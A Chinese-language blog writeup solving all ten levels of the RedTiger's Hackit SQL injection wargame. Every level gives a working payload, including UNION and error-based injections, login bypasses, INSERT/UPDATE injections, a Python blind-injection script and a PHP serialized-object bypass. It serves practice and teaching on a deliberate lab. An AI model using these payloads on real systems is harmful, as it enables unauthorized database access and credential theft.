MitAh's Blog
Redtiger Hackit Writeup

最近刷起了 wechall
视奸 xr1s 的 gayhub 发现一个刷分又快又蛮基础的 sqli 练习平台
RedTigers Hackit

一共就10题,记录一下 WP


level 1

Welcome to level 1

Lets start with a simple injection.

Target: Get the login for the user Hornoxe
Hint: You really need one? omg
Tablename: level1_users

最常规的 sql 注入,注入点在 ?cat=1

payload:

http://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users


level 2

Welcome to level 2

A simple loginbypass

Target: Login
Hint: Condition

最基础的万能密码

payload:

username: admin
password: 1'or'1'='1


level 3

Welcome to Level 3

Target: Get the password of the user Admin.
Hint: Try to get an error. Tablename: level3_users

题目有一个提示:Try to get an error

想了好久才发现可以把 get 参数 usr 改为 usr[]

根据报错找到源码地址,利用现成的加解密函数,剩下就是常规的注入了。

奇怪的是,同一份代码,我在瘟斗士和乌班图上得出的结果是不一样的...

srand 同一个 seed 得出的伪随机数列不一样... 不知道为什么

payload:

$sql = "' UNION SELECT 1, username, 3, 4, 5, password, 7 FROM level3_users WHERE username='Admin'#";
echo encrypt($sql);


level 4

Welcome to Level 4

Target: Get the value of the first entry in table level4_secret in column keyword
Disabled: like

通过 Query returned 1 rows. 判断,进行布尔盲注。

比较基础,直接贴代码了。

import requests

s = requests.session()
url = 'https://redtiger.labs.overthewire.org/level4.php?id=1 AND ASCII(SUBSTR((%s),%d,1))=%d'
sql = "SELECT keyword from level4_secret"
headers = {
    'Cookie': 'level4login=there_is_no_bug'
}
finish = False
len = 1
result = []

while not finish:
    for c in range(0x20, 0x80):
        req = (url % (sql, len, c))
        text = s.get(req, headers=headers).text
        jud = text[text.find('Query returned') + 15]
        if jud == '1':
            print(chr(c))
            result.append(chr(c))
            break
    else:
        finish = True
    len += 1

print(''.join(result))


level 5

Welcome to Level 5

Target: Bypass the login
Disabled: substring , substr, ( , ), mid
Hints: its not a blind, the password is md5-crypted, watch the login errors

很常规的一道题了,union select 一组虚构的 usernamepasswprd 绕过登陆验证

payload:

username: ' union select '123', md5('123')#
password: 123


level 6

Welcome to Level 6
Target: Get the first user in table level6_users with status 1

id=1' 试一下,果然报错了,那么就找到注入点了

order by 测一下,列数为5

union select 1,2,3,4,5 并无回显,提示 User not found

将第二个字段修改为 username 成功显示了 admin 账户的资料卡

这里猜测后台进行了2次 sql 查询,从第一次查询的结果中取出 username 再进行第二次查询获取 email

那么只需要对 username 字段进行注入

注意到语句中出现单引号就会报错,用16进制来绕过

>>> payload = "' union select 1,username,3,password,5 from level6_users where status=1#"
>>> binascii.hexlify(payload.encode())

最终构造的 payload 为

https://redtiger.labs.overthewire.org/level6.php?user=0 union select 1,[hex_payload],3,4,5 from level6_users where status=1


level 7

Welcome to Level 7

Target: Get the name of the user who posted the news about google. Table: level7_news column: autor
Restrictions: no comments, no substr, no substring, no ascii, no mid, no like

来一个单引号小试牛刀,给了报错和 sql 语句。

An error occured!:   
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%' OR text.title LIKE '%'%')' at line 1

SELECT news.*,text.text,text.title FROM level7_news news, level7_texts text WHERE text.id = news.id AND (text.text LIKE '%'%' OR text.title LIKE '%'%')

目测是报错注入,然而注释被过滤了,构造 payload 把引号括号统统闭合即可。

payload:

') UNION SELECT UPDATEXML(1,CONCAT(0x7e,(SELECT autor FROM level7_news LIMIT 1 OFFSET 2)),0) OR ('


level 8

Welcome to Level 8

Target: Get the password of the admin.

每个 input 都加个引号,发现只有在 email 处有报错,那么注入点就在 email 这了。

猜测 sql 语句应该为

update table set email='[email]', name='[name]', icq='[icq]', age='[age]' where id=1

可以直接给 email 赋值 password,看返回值

payload:

',email=password,name='


level 9

Welcome to Level 9

Target: Get username and password of any user. Tablename: level9_users
This is not a blind injection. There is a way to get some output back:)

在输入框中提交的内容会显示在页面上

可以利用 insert 语句来构造注入

猜测语句为

insert into tablename(autor,title,text) values('[autor]','[title]','[text]')

简单测试后得到注入点在 text 字段

构造 payload 再插入一项,使需要的信息回显

1'), ((select username from level9_users limit 1), (select password from level9_users limit 1),'1


level 10

Welcome to Level 10

Target: Bypass the login. Login as TheMaster

F12 看一下发现有一个 hidden 的 input ,里面的 base64 解码后是一段 php 序列化数据。
unserialize 之后是

Array
(
    [username] => Monkey
    [password] => 0815password
)

根据题解,只要把 username 改成 TheMasterpassword 改成 true 即可。

payload:

serialize: a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}
base64: YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=

php 弱类型的问题

echo true=='admin';
//1


AK

0 评论

分类目录
赞助二维码

支付宝

评论表情